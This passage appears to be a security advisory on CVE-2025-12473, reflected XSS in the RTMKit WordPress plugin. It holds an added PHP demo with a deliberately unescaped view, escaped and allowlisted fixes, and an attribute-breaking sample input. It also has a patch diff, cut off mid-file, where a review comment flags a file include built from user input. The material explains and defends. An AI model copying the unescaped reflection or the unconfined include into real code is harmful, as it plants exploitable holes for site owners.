Atomic Edge analysis of CVE-2025-12473:
The vulnerability is a reflected cross-site scripting (XSS) flaw in the RTMKit WordPress plugin. The root cause is insufficient input sanitization and output escaping for the ‘themebuilder’ parameter within the plugin’s admin interface. The vulnerable code resides in the ThemebuilderModule class, specifically in the ‘render’ method or a related view file that echoes the unsanitized parameter value. Attackers can exploit this by crafting a malicious URL containing a JavaScript payload in the ‘themebuilder’ parameter and tricking an administrator into clicking it. When the administrator visits the crafted URL while authenticated, the payload executes in the context of the WordPress admin area, allowing for session hijacking, site defacement, or plugin installation. The patch addresses this by implementing proper output escaping, likely using esc_html() or esc_attr() functions, before echoing the parameter value. The impact is a client-side code execution attack targeting administrators, which can lead to full site compromise.
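The pattern described above, shown as an added example (not RTMKit code and not taken from the patch): a view that reflects the 'themebuilder' query value raw, next to an escaped version and an allowlisted version. The function names, the tab names and the sample inputs are hypothetical, and the `esc_*`/`sanitize_key` stand-ins exist only so the file runs without WordPress loaded.

```php
<?php
// Added illustration: hypothetical views, not the plugin's code.

// Stand-ins so this runs outside WordPress. Inside a plugin, the real
// esc_attr(), esc_html() and sanitize_key() from WordPress core are used.
if (!function_exists('esc_attr')) {
    function esc_attr($text) { return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8'); }
}
if (!function_exists('esc_html')) {
    function esc_html($text) { return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8'); }
}
if (!function_exists('sanitize_key')) {
    function sanitize_key($key) { return preg_replace('/[^a-z0-9_\-]/', '', strtolower((string) $key)); }
}

// BEFORE: the raw query value lands in an attribute and in a text node.
function render_tab_vulnerable(array $query): string
{
    $tab = $query['themebuilder'] ?? '';
    return '<div class="rtm-tab" data-tab="' . $tab . '">Editing: ' . $tab . '</div>';
}

// AFTER (escape on output): each sink gets the escaper for its context.
function render_tab_escaped(array $query): string
{
    $tab = (string) ($query['themebuilder'] ?? '');
    return '<div class="rtm-tab" data-tab="' . esc_attr($tab) . '">Editing: ' . esc_html($tab) . '</div>';
}

// AFTER (validate, then escape): only known tab names are ever reflected.
function render_tab_allowlisted(array $query): string
{
    $allowed = ['header', 'footer', 'single'];   // hypothetical tab names
    $tab = sanitize_key($query['themebuilder'] ?? '');
    if (!in_array($tab, $allowed, true)) {
        $tab = 'header';                         // safe default for anything unexpected
    }
    return '<div class="rtm-tab" data-tab="' . esc_attr($tab) . '">Editing: ' . esc_html($tab) . '</div>';
}

// True when the marker element from the input survived as live markup.
function marker_is_live(string $html): bool
{
    return strpos($html, '<i>') !== false;
}

// Constructed inputs: one ordinary value, one that tries to close the
// attribute and add an element (a harmless <i> marker stands in for script).
$samples = [
    ['themebuilder' => 'footer'],
    ['themebuilder' => '"><i>marker</i>'],
];

foreach ($samples as $query) {
    foreach (['render_tab_vulnerable', 'render_tab_escaped', 'render_tab_allowlisted'] as $view) {
        $html = $view($query);
        printf("%-24s live_markup=%-3s %s\n", $view, marker_is_live($html) ? 'yes' : 'no', $html);
    }
}
```

Escaping alone closes the injection; the allowlist additionally keeps unexpected values out of the page, which is the same approach the patched `redirect()` method takes for the `page` parameter.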

CVE-2025-12473: RTMKit <= 1.6.8 – Reflected Cross-Site Scripting via 'themebuilder' Parameter (rometheme-for-elementor)
CVE-2025-12473
rometheme-for-elementor
1.6.8
2.0.0
Analysis Overview
Differential between vulnerable and patched code
--- a/rometheme-for-elementor/Inc/Core/Plugin.php
+++ b/rometheme-for-elementor/Inc/Core/Plugin.php
@@ -0,0 +1,280 @@
+<?php
+
+namespace RTMKitCore;
+
+/**
+ * Plugin
+ *
+ * Main plugin class for RomeThemeKit.
+ *
+ * @package RTMKitCore
+ */
+
+use DomElement;
+use Exception;
+
+class Plugin
+{
+ protected $modules;
+
+ protected static $instance;
+
+ /**
+ * Get the singleton instance of the Plugin class.
+ *
+ * @return Plugin
+ */
+ public static function instance(): self
+ {
+ if (!isset(self::$instance)) {
+ self::$instance = new self();
+ }
+ return self::$instance;
+ }
+
+ public function init()
+ {
+ if (! $this->wizard_setup_check()) {
+ (new RTMKitModulesSetupWizardSetupWizardModule())->init();
+ return;
+ }
+ add_action('admin_page_access_denied', [$this, 'redirect']);
+ // Wizard sudah selesai → jalankan plugin normal
+ $this->runner();
+ }
+
+ function redirect()
+ {
+ if (!is_admin()) {
+ return;
+ }
+
+ if (!current_user_can('manage_options')) {
+ return;
+ }
+
+ if (!isset($_GET['page'])) {
+ return;
+ }
+
+ $page = sanitize_key($_GET['page']);
+
+ // Daftar page admin plugin yang VALID
+ $valid_pages = [
+ 'rtmkit',
+ 'rtmkit-setup-wizard',
+ ];
+
+ // 1️⃣ Kalau page tidak valid → redirect ke halaman utama plugin
+ if (!in_array($page, $valid_pages, true)) {
+ wp_safe_redirect(admin_url('admin.php?page=rtmkit'));
+ exit;
+ }
+
+ // 2️⃣ Kalau wizard dibuka tapi sudah selesai → redirect
+ if ($page === 'rtmkit-setup-wizard') {
+ if (get_option('rtmkit_wizard_setup_complete_2.0', false)) {
+ wp_safe_redirect(admin_url('admin.php?page=rtmkit'));
+ exit;
+ }
+ // wizard belum selesai → biarkan
+ return;
+ }
+ }
+
+ public function before_plugin_load()
+ {
+ add_action('upgrader_process_complete', function ($upgrader, $hook_extra) {
+
+ if (
+ empty($hook_extra['action']) ||
+ empty($hook_extra['type']) ||
+ $hook_extra['action'] !== 'update' ||
+ $hook_extra['type'] !== 'plugin'
+ ) {
+ return;
+ }
+
+ if (
+ empty($hook_extra['plugins']) ||
+ !in_array(plugin_basename(RTM_KIT_FILE), $hook_extra['plugins'], true)
+ ) {
+ return;
+ }
+
+ $this->rtm_handle_install_upgrade();
+ }, 10, 2);
+ add_action('admin_init', function () {
+ if (!get_option('rtmkit_redirect_wizard')) {
+ return;
+ }
+ if (
+ wp_doing_ajax() ||
+ wp_doing_cron() ||
+ defined('WP_CLI') ||
+ !current_user_can('manage_options')
+ ) {
+ return;
+ }
+
+ if (isset($_GET['page']) && $_GET['page'] === 'rtmkit-setup-wizard') {
+ return;
+ }
+
+ delete_option('rtmkit_redirect_wizard');
+
+ wp_safe_redirect(admin_url('admin.php?page=rtmkit-setup-wizard'));
+ exit;
+ });
+ }
+
+ public function wizard_setup_check()
+ {
+ $setup_complete = get_option('rtmkit_wizard_setup_complete_2.0', false);
+ return $setup_complete;
+ }
+
+ public function runner()
+ {
+ $this->modules = [
+ 'menu' => RTMKitModulesMenu::class,
+ 'plugin_api' => PluginApi::class,
+ 'modules' => RTMKitModulesManager::class,
+ 'widget_module' => RTMKitModulesWidgetsWidgetModule::class,
+ 'extensions' => RTMKitModulesExtensionsExtensionModule::class,
+ 'themebuilder' => RTMKitModulesThemebuilderThemebuilderModule::class,
+ 'templatekits' => RTMKitModulesTemplatekitsTemplatekitModule::class,
+ 'icons' => RTMKitModulesRTMIconsRTMIconsModule::class,
+ 'submission' => RTMKitModulesSubmissionSubmissionModule::class,
+ 'update' => RTMKitModulesUpdateUpdateModule::class,
+ 'editor_canvas' => RTMKitModulesHelperEditorCanvas::class
+ ];
+ add_action('rtmkit_loaded', [$this, 'load']);
+ add_action('admin_enqueue_scripts', function () {
+ wp_enqueue_style('rtmkit-system-panel', RTM_KIT_URL . 'assets/css/panel_system.css', [], RTM_KIT_VERSION);
+ wp_enqueue_script('rtmkit-system-panel', RTM_KIT_URL . 'assets/js/panel_system.js', ['jquery'], RTM_KIT_VERSION, true);
+ });
+ add_action('wp_enqueue_scripts', function () {
+ wp_enqueue_style('rtmkit-system-panel', RTM_KIT_URL . 'assets/css/panel_system.css', [], RTM_KIT_VERSION);
+ wp_enqueue_script('rtmkit-system-panel', RTM_KIT_URL . 'assets/js/panel_system.js', ['jquery'], RTM_KIT_VERSION, true);
+ });
+ }
+
+ /**
+ * Load plugin.
+ */
+
+ public function load()
+ {
+ try {
+ $this->loadModules();
+ add_action('elementor/editor/after_enqueue_scripts', [$this, 'enqueue_panel_styles']);
+ add_filter('admin_footer_text', function ($text) {
+ $screen = get_current_screen();
+
+ if (!$screen) {
+ return $text;
+ }
+
+ // contoh: hanya pada page plugin
+ if ($screen->id === 'toplevel_page_rtmkit') {
+ return '';
+ }
+
+ return $text;
+ });
+
+ add_filter('update_footer', function ($text) {
+ $screen = get_current_screen();
+
+ if ($screen && $screen->id === 'toplevel_page_rtmkit') {
+ return '';
+ }
+
+ return $text;
+ }, 11);
+
+ new RTMKitModulesHelperBanner();
+ } catch (Exception $e) {
+ // Handle exceptions if necessary
+ error_log($e->getMessage());
+ }
+ }
+
+ /**
+ * Load modules.
+ */
+ protected function loadModules(): void
+ {
+ foreach ($this->modules as $module => $class) {
+ (new $class())->init();
+ }
+ }
+
+ /**
+ * Check if the RomeThemeForm plugin is active.
+ *
+ * @return bool
+ */
+ public function has_rtmform(): bool
+ {
+ include_once(ABSPATH . 'wp-admin/includes/plugin.php');
+ return is_plugin_active('romethemeform/rometheme-form.php');
+ }
+
+ public function enqueue_panel_styles()
+ {
+ if (ElementorPlugin::$instance->editor->is_edit_mode()) {
+ wp_enqueue_style('rtmkit-elementor-panel', RTM_KIT_URL . 'assets/css/panel.css', [], RTM_KIT_VERSION);
+ }
+ }
+
+ public function pro_is_active(): bool
+ {
+ if (class_exists('RTMKitProCorePlugin')) {
+ return RTMKitProModulesLicensesLicenseStorage::instance()->isLicenseActive();
+ }
+
+ return false;
+ }
+
+ public function rtm_handle_install_upgrade()
+ {
+ update_option('rtmkit_version', RTM_KIT_VERSION);
+
+ $wizardComplete = get_option('rtmkit_wizard_setup_complete_2.0', false);
+
+ if (!$wizardComplete) {
+ add_option('rtmkit_redirect_wizard', true);
+ }
+ }
+
+ public function pro_version_compatible_check()
+ {
+ $pro_plugin = 'romethemekit-pro/RomeTheme_pro.php';
+ $pro_path = WP_PLUGIN_DIR . '/' . $pro_plugin;
+
+ if (file_exists($pro_path)) {
+
+ if (!function_exists('get_plugin_data')) {
+ require_once ABSPATH . 'wp-admin/includes/plugin.php';
+ }
+
+ $pro_version = get_plugin_data($pro_path, false, false);
+
+ if (
+ class_exists('RTMKitModulesUpdateUpdateModule') &&
+ method_exists('RTMKitModulesUpdateUpdateModule', 'instance')
+ ) {
+ $plugins = RTMKitModulesUpdateUpdateModule::instance()->get_plugins();
+
+ if (
+ isset($plugins['rtmkitpro']['min_version']) &&
+ version_compare($pro_version['Version'], $plugins['rtmkitpro']['min_version'], '<')
+ ) {
+ deactivate_plugins($pro_plugin);
+ }
+ }
+ }
+ }
+}
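Review bot: in `load()`, `catch (Exception $e)` does not cover the failure `loadModules()` is most likely to hit. `(new $class())->init()` on a class that cannot be loaded raises `Error`, which is not an `Exception`, so a single missing module propagates as a fatal error instead of being logged; catch `\Throwable` there. In the `admin_init` closure, `$_GET['page']` is compared raw while `redirect()` passes it through `sanitize_key()`; the comparison against a literal is safe, but using the same handling in both places keeps the two page checks consistent. `redirect()` is also the only method declared without a visibility keyword, and it has no docblock. Note that nothing in this file reads the `themebuilder` request parameter: the module is only registered in `runner()`, so the output-escaping change has to be reviewed in the Themebuilder module itself.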
--- a/rometheme-for-elementor/Inc/Core/PluginApi.php
+++ b/rometheme-for-elementor/Inc/Core/PluginApi.php
@@ -0,0 +1,86 @@
+<?php
+
+namespace RTMKitCore;
+
+class PluginApi
+{
+ /**
+ * Get the singleton instance of the PluginApi class.
+ *
+ * @return PluginApi
+ */
+ public static function instance(): self
+ {
+ static $instance = null;
+
+ if (null === $instance) {
+ $instance = new self();
+ }
+
+ return $instance;
+ }
+
+ /**
+ * Initialize the plugin API.
+ */
+ public function init()
+ {
+ if (wp_doing_ajax()) {
+ add_action('wp_ajax_get_sidebar_content', [$this, 'get_sidebar_content']);
+ add_action('wp_ajax_get_content', [$this, 'get_content']);
+ add_action('wp_ajax_set_global_site', [$this, 'set_global_site']);
+ }
+ }
+
+ public function get_sidebar_content()
+ {
+ // Load the sidebar view file
+
+ check_ajax_referer('rtmkit_nonce', 'nonce');
+ if (!file_exists(RTM_KIT_DIR . 'views/sidebar.php')) {
+ wp_send_json_error('Sidebar view file not found.');
+ return;
+ }
+ ob_start();
+ require_once RTM_KIT_DIR . 'views/sidebar.php';
+ $content = ob_get_clean();
+ wp_send_json_success($content);
+ }
+
+ public function get_content()
+ {
+ check_ajax_referer('rtmkit_nonce', 'nonce');
+
+ if (!isset($_POST['path'])) {
+ wp_send_json_error('Path not specified.');
+ return;
+ }
+ $path = sanitize_text_field($_POST['path']);
+ $file = RTM_KIT_DIR . 'views/' . $path . '.php';
+ if (!file_exists($file)) {
+ return '';
+ }
+ ob_start();
+ require_once $file;
+ $content = ob_get_clean();
+ wp_send_json_success($content);
+ }
+
+ public function set_global_site()
+ {
+ check_ajax_referer('rtmkit_nonce', 'nonce');
+
+ if (!current_user_can('manage_options')) {
+ wp_send_json_error('Access Denied.');
+ wp_die();
+ }
+
+ $idKit = sanitize_text_field($_POST['idKit']);
+ $update = update_option('elementor_active_kit', $idKit);
+ if ($update) {
+ wp_send_json_success('Global Site Settings updated successfully.');
+ } else {
+ wp_send_json_error('No changes were made.');
+ }
+ }
+}
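Review bot: `get_content()` builds the include path from `$_POST['path']` after only `sanitize_text_field()`, which does not strip `/` or `..`, so `require_once $file` is not confined to `views/`. Map the request value onto a fixed allowlist of view names, or compare `realpath($file)` against the resolved `views/` directory prefix, before including anything. `get_content()` and `get_sidebar_content()` also rely on the nonce alone; add the `current_user_can('manage_options')` check that `set_global_site()` already performs. The missing-file branch in `get_content()` does `return '';`, which leaves the AJAX request without a JSON response, unlike the `wp_send_json_error()` used for a missing path. In `set_global_site()`, `$_POST['idKit']` is read without an `isset()` check and stored as text; if the kit ID is a post ID, `absint()` is the better fit.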
--- a/rometheme-for-elementor/Inc/Elements/Accordion.php
+++ b/rometheme-for-elementor/Inc/Elements/Accordion.php
@@ -0,0 +1,1149 @@
+<?php
+
+namespace RTMKitElements;
+
+class Accordion extends ElementorWidget_Base
+{
+ private function get_widget_data()
+ {
+ return RTMkitModulesWidgetsWidgetStorage::instance()->get_widget_data_by_key('accordion');
+ }
+
+ public function get_name()
+ {
+ return 'rkit-accordion';
+ }
+
+ public function get_title()
+ {
+ return $this->get_widget_data()['name'];
+ }
+
+ public function get_icon()
+ {
+ $icon = 'rkit-widget-icon ' . $this->get_widget_data()['icon'];
+ return $icon;
+ }
+ public function get_categories()
+ {
+ return ['romethemekit_widgets'];
+ }
+
+ public function get_keywords()
+ {
+ return ['accordion', 'rometheme'];
+ }
+
+ function get_custom_help_url()
+ {
+ return 'https://support.rometheme.net/docs/romethemekit/widgets/how-to-use-ezd_ampersand-customize-accordion-widget/';
+ }
+
+ public function get_style_depends()
+ {
+ return ['rtmkit-element-accordion'];
+ }
+
+ public function get_script_depends()
+ {
+ return ['rtmkit-element-accordion'];
+ }
+
+ public function get_elementor_template()
+ {
+ $template = get_posts([
+ 'post_type' => 'elementor_library',
+ 'posts_per_page' => -1,
+ 'meta_query' => [
+ [
+ 'key' => '_elementor_template_type',
+ 'value' => 'kit',
+ 'compare' => '!=',
+ ],
+ ],
+ ]);
+ $list = [];
+ if ($template) {
+ foreach ($template as $template) {
+ $list[intval($template->ID)] = esc_html__($template->post_title, 'rometheme-for-elementor');
+ }
+ }
+ return $list;
+ }
+
+ protected function register_controls()
+ {
+ $this->start_controls_section('accordion', ['label' => esc_html('Accordion'), 'tab' => ElementorControls_Manager::TAB_CONTENT]);
+
+ $list = new ElementorRepeater();
+
+ $list->add_control('accordion_title', [
+ 'label' => esc_html('Title'),
+ 'type' => ElementorControls_Manager::TEXT,
+ 'placeholder' => esc_html('Input Your Title Here')
+ ]);
+
+ $list->add_control('accordion_sub_title', [
+ 'label' => esc_html('Sub Title'),
+ 'type' => ElementorControls_Manager::TEXT,
+ 'placeholder' => esc_html('Input Your Sub Title Here')
+ ]);
+
+ $list->add_control(
+ 'open_default',
+ [
+ 'label' => esc_html__('Default Open ?', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::SWITCHER,
+ 'label_on' => esc_html__('Yes', 'rometheme-for-elementor'),
+ 'label_off' => esc_html__('No', 'rometheme-for-elementor'),
+ 'return_value' => 'yes',
+ ]
+ );
+
+ $list->add_control('description_type', [
+ 'label' => esc_html('Description Type'),
+ 'type' => ElementorControls_Manager::SELECT,
+ 'options' => [
+ 'description' => esc_html('Description'),
+ 'template' => esc_html('Saved Template'),
+ ],
+ 'default' => 'description'
+ ]);
+
+ $list->add_control(
+ 'item_description',
+ [
+ 'label' => esc_html__('Description', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::WYSIWYG,
+ 'placeholder' => esc_html__('Type your description here', 'rometheme-for-elementor'),
+ 'condition' => [
+ 'description_type' => 'description'
+ ]
+ ]
+ );
+
+ $list->add_control('item_template', [
+ 'label' => esc_html('Choose Templates'),
+ 'type' => ElementorControls_Manager::SELECT,
+ 'options' => $this->get_elementor_template(),
+ 'condition' => [
+ 'description_type' => 'template'
+ ]
+ ]);
+
+ $list->add_control(
+ 'accordion_header_icon',
+ [
+ 'label' => esc_html__('Title Icon', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::ICONS,
+ 'default' => [
+ 'value' => 'rtmicon-thin rtmicon-romethemekit',
+ 'library' => 'rtmicons-thin',
+ ],
+ ]
+ );
+
+ $this->add_control(
+ 'show_loop_count',
+ [
+ 'label' => esc_html__('Show Index Number', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::SWITCHER,
+ 'label_on' => esc_html__('Yes', 'rometheme-for-elementor'),
+ 'label_off' => esc_html__('No', 'rometheme-for-elementor'),
+ 'return_value' => 'yes',
+ 'default' => '',
+ ]
+ );
+
+ $this->add_control(
+ 'show_zero_padded',
+ [
+ 'label' => esc_html__('Use Index with Zero-Pad', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::SWITCHER,
+ 'label_on' => esc_html__('Yes', 'rometheme-for-elementor'),
+ 'label_off' => esc_html__('No', 'rometheme-for-elementor'),
+ 'return_value' => 'yes',
+ 'default' => '',
+ 'condition' => [
+ 'show_loop_count' => 'yes'
+ ]
+ ]
+ );
+
+ $this->add_control(
+ 'show_heading_icons',
+ [
+ 'label' => esc_html__('Show Title Icon', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::SWITCHER,
+ 'label_on' => esc_html__('Yes', 'rometheme-for-elementor'),
+ 'label_off' => esc_html__('No', 'rometheme-for-elementor'),
+ 'return_value' => 'yes',
+ 'default' => '',
+ ]
+ );
+
+ $this->add_control(
+ 'show_subheading',
+ [
+ 'label' => esc_html__('Show Sub Title', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::SWITCHER,
+ 'label_on' => esc_html__('Yes', 'rometheme-for-elementor'),
+ 'label_off' => esc_html__('No', 'rometheme-for-elementor'),
+ 'return_value' => 'yes',
+ 'default' => '',
+ ]
+ );
+
+ $this->add_control('title_tag', [
+ 'label' => esc_html('Title HTML Tag'),
+ 'type' => ElementorControls_Manager::SELECT,
+ 'options' => [
+ 'h1' => esc_html('H1'),
+ 'h2' => esc_html('H2'),
+ 'h3' => esc_html('H3'),
+ 'h4' => esc_html('H4'),
+ 'h5' => esc_html('H5'),
+ 'h6' => esc_html('H6'),
+ 'span' => esc_html('Span'),
+ 'div' => esc_html('DIV')
+ ],
+ 'default' => 'span'
+ ]);
+
+ $this->add_control(
+ 'hr',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_control('list_items', [
+ 'label' => esc_html('Content'),
+ 'type' => ElementorControls_Manager::REPEATER,
+ 'fields' => $list->get_controls(),
+ 'default' => [
+ [
+ 'accordion_title' => esc_html('Accordion #1'),
+ 'accordion_sub_title' => esc_html('Accordion Sub Title #1'),
+ 'open_default' => 'yes',
+ 'item_description' => esc_html('Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam non lacus quam. Donec est velit, condimentum vitae tempor eget, pretium et massa. Integer velit dui, lacinia non turpis at, lobortis tincidunt risus. Donec ut cursus urna. Praesent luctus interdum ante. Lorem ipsum dolor sit amet, consectetur adipiscing elit.')
+ ],
+ [
+ 'accordion_title' => esc_html('Accordion #2'),
+ 'accordion_sub_title' => esc_html('Accordion Sub Title #2'),
+ 'item_description' => esc_html('Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam non lacus quam. Donec est velit, condimentum vitae tempor eget, pretium et massa. Integer velit dui, lacinia non turpis at, lobortis tincidunt risus. Donec ut cursus urna. Praesent luctus interdum ante. Lorem ipsum dolor sit amet, consectetur adipiscing elit.')
+ ],
+ [
+ 'accordion_title' => esc_html('Accordion #3'),
+ 'accordion_sub_title' => esc_html('Accordion Sub Title #3'),
+ 'item_description' => esc_html('Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam non lacus quam. Donec est velit, condimentum vitae tempor eget, pretium et massa. Integer velit dui, lacinia non turpis at, lobortis tincidunt risus. Donec ut cursus urna. Praesent luctus interdum ante. Lorem ipsum dolor sit amet, consectetur adipiscing elit.')
+ ],
+ ],
+ 'title_field' => '{{{ accordion_title }}}'
+ ]);
+
+ $this->end_controls_section();
+
+ $this->start_controls_section('icons_content', [
+ 'label' => esc_html('Toggle Icon'),
+ 'tab' => ElementorControls_Manager::TAB_CONTENT
+ ]);
+
+ $this->add_control(
+ 'icon_position',
+ [
+ 'label' => esc_html__('Icon Position', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::CHOOSE,
+ 'options' => [
+ 'row-reverse' => [
+ 'title' => esc_html__('Left', 'rometheme-for-elementor'),
+ 'icon' => 'eicon-h-align-left',
+ ],
+ 'row' => [
+ 'title' => esc_html__('Right', 'rometheme-for-elementor'),
+ 'icon' => 'eicon-h-align-right',
+ ],
+ ],
+ 'default' => 'row',
+ 'toggle' => true,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion-header' => 'flex-direction: {{VALUE}};',
+ ],
+ ]
+ );
+
+ $this->add_control(
+ 'icon_close',
+ [
+ 'label' => esc_html__('Icon', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::ICONS,
+ 'default' => [
+ 'value' => 'rtmicon rtmicon-chevron-down',
+ 'library' => 'rtmicons',
+ ],
+ ]
+ );
+
+ $this->add_control(
+ 'icon_open',
+ [
+ 'label' => esc_html__('Icon Active', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::ICONS,
+ 'default' => [
+ 'value' => 'rtmicon rtmicon-chevron-up',
+ 'library' => 'rtmicons',
+ ],
+ ]
+ );
+
+ $this->end_controls_section();
+
+ $this->start_controls_section('accordion_style', [
+ 'label' => esc_html('Accordion'),
+ 'tab' => ElementorControls_Manager::TAB_STYLE
+ ]);
+
+ $this->add_responsive_control(
+ 'accordion_spacing',
+ [
+ 'label' => esc_html__('Spacing', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::SLIDER,
+ 'size_units' => ['px', 'em', 'rem', 'custom'],
+ 'range' => [
+ 'px' => [
+ 'min' => 0,
+ 'max' => 1000,
+ 'step' => 5,
+ ],
+ ],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion' => 'gap: {{SIZE}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->end_controls_section();
+
+ $this->start_controls_section('title_style', [
+ 'label' => esc_html('Title'),
+ 'tab' => ElementorControls_Manager::TAB_STYLE
+ ]);
+
+ $this->add_responsive_control(
+ 'title_text_align',
+ [
+ 'label' => esc_html__('Alignment', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::CHOOSE,
+ 'options' => [
+ 'left' => [
+ 'title' => esc_html__('Left', 'rometheme-for-elementor'),
+ 'icon' => 'eicon-text-align-left',
+ ],
+ 'center' => [
+ 'title' => esc_html__('Center', 'rometheme-for-elementor'),
+ 'icon' => 'eicon-text-align-center',
+ ],
+ 'right' => [
+ 'title' => esc_html__('Right', 'rometheme-for-elementor'),
+ 'icon' => 'eicon-text-align-right',
+ ],
+ ],
+ 'default' => 'left',
+ 'toggle' => true,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__title, {{WRAPPER}} .header-subtitle' => 'text-align: {{VALUE}};',
+ ],
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Typography::get_type(),
+ [
+ 'name' => 'title_typography',
+ 'selector' => '{{WRAPPER}} .rkit-accordion__title',
+ ]
+ );
+
+ $this->add_responsive_control(
+ 'title_padding',
+ [
+ 'label' => esc_html__('Padding', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::DIMENSIONS,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__title' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->start_controls_tabs('title_tabs');
+
+ $this->start_controls_tab('title_tab_close', ['label' => esc_html('Close')]);
+
+ $this->add_control('text_color_close', [
+ 'label' => esc_html('Text Color'),
+ 'type' => ElementorControls_Manager::COLOR,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__title' => 'color:{{VALUE}}'
+ ]
+ ]);
+
+ $this->add_control(
+ 'acc_bg_hr_close',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Background::get_type(),
+ [
+ 'name' => 'acc_background_close',
+ 'types' => ['classic', 'gradient'],
+ 'selector' => '{{WRAPPER}} .rkit-accordion-header',
+ ]
+ );
+
+ $this->add_control(
+ 'acc_border_hr_close',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Border::get_type(),
+ [
+ 'name' => 'acc_border_close',
+ 'selector' => '{{WRAPPER}} .rkit-accordion-header',
+ ]
+ );
+
+ $this->add_responsive_control(
+ 'title_radius_close',
+ [
+ 'label' => esc_html__('Border Radius', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::DIMENSIONS,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion-header' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Box_Shadow::get_type(),
+ [
+ 'name' => 'accordion_box_shadow_close',
+ 'selector' => '{{WRAPPER}} .rkit-accordion-header',
+ ]
+ );
+
+ $this->end_controls_tab();
+
+ $this->start_controls_tab('title_tab_open', ['label' => esc_html('Open')]);
+
+ $this->add_control('text_color_open', [
+ 'label' => esc_html('Text Color'),
+ 'type' => ElementorControls_Manager::COLOR,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion-item.open .rkit-accordion__title' => 'color:{{VALUE}}'
+ ]
+ ]);
+
+ $this->add_control(
+ 'acc_bg_hr_open',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Background::get_type(),
+ [
+ 'name' => 'acc_background_open',
+ 'types' => ['classic', 'gradient'],
+ 'selector' => '{{WRAPPER}} .rkit-accordion-item.open .rkit-accordion-header',
+ ]
+ );
+
+ $this->add_control(
+ 'acc_border_hr_open',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Border::get_type(),
+ [
+ 'name' => 'acc_border_open',
+ 'selector' => '{{WRAPPER}} .rkit-accordion-item.open .rkit-accordion-header',
+ ]
+ );
+
+ $this->add_responsive_control(
+ 'title_radius_open',
+ [
+ 'label' => esc_html__('Border Radius', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::DIMENSIONS,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion-item.open .rkit-accordion-header' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Box_Shadow::get_type(),
+ [
+ 'name' => 'accordion_box_shadow_open',
+ 'selector' => '{{WRAPPER}} .rkit-accordion-item.open .rkit-accordion-header',
+ ]
+ );
+
+ $this->end_controls_tab();
+
+ $this->start_controls_tab('title_tab_hover', ['label' => esc_html('Hover')]);
+
+ $this->add_control('text_color_hover', [
+ 'label' => esc_html('Text Color'),
+ 'type' => ElementorControls_Manager::COLOR,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion-header:hover .rkit-accordion__title' => 'color:{{VALUE}}'
+ ]
+ ]);
+
+ $this->add_control(
+ 'acc_bg_hr_hover',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Background::get_type(),
+ [
+ 'name' => 'acc_background_hover',
+ 'types' => ['classic', 'gradient'],
+ 'selector' => '{{WRAPPER}} .rkit-accordion-header:hover',
+ ]
+ );
+
+ $this->add_control(
+ 'acc_border_hr_hover',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Border::get_type(),
+ [
+ 'name' => 'acc_border_hover',
+ 'selector' => '{{WRAPPER}} .rkit-accordion-header:hover',
+ ]
+ );
+
+ $this->add_responsive_control(
+ 'title_radius_hover',
+ [
+ 'label' => esc_html__('Border Radius', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::DIMENSIONS,
